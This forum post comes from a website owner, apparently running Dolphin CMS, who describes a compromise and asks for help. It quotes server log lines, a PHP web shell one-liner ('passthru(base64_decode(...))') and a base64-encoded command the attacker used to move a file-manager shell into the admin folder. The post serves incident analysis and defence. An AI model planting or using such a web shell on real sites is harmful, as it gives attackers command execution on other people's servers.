One of my websites was down this morning and i was able to find the reason, someone edited my /inc/admin.inc.php file and entered an ")" that produced a blank site because PHP throw an error on that.
I found two files in my /tmp folder, called a.php and admin.inc.php (which was the original, unmodified, one).
In the /administration folder there was a file called wa.php, which is a filemanager in one PHP file.
So, how was that possible?
After having a look at my server logs i saw that someone did a POST request to /administration/modules.php. Right after that he/she executes the a.php file in /tmp folder with an URL query.
[30/Oct/2016:20:47:03 +0000] "POST /administration/modules.php HTTP/1.0" 200 94709 "-" "-"
[30/Oct/2016:20:47:05 +0000] "GET /tmp/a.php?a=bXYgd2EucGhwIC4uL2FkbWluaXN0cmF0aW9uL3dhLnBocA== HTTP/1.0" 200 - "-" "-"
The content of the a.php file is something like "passthru(base64_decode($_GET['a']));"
After base64_decode the query parameter "a" is something like "mv wa.php ../administration/wa.php"
Now he/she was able to execute the wa.php file and change every file inside the Dolphin installation. Lucky me that he/she only changed the admin.inc.php file to bring my site down.
[30/Oct/2016:20:47:06 +0000] "GET /administration/wa.php HTTP/1.0" 200 89024 "-" "-"
Anyone has an idea why this person was able to upload the files to the /tmp folder and how we can prevent those guys from doing this again?
